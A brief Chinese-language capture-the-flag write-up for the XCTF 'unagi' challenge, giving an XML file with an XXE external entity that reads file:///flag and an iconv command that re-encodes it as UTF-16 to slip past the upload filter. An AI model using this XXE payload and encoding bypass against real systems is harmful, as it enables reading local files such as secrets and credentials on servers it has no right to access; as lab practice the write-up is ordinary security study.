xctf攻防世界unagi wp
访问题目地址
点击Upload下的here
从信息提示中可以知道要通过编写xml文件上传
即通过XXE编码转换成utf-16编码绕过
可以利用vim编辑xml文件(取名为2.xml)代码如下:
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
执行转换命令
iconv -f utf8 -t utf-16 2.xml>1.xml
将1.xml上传到upload,拿到flag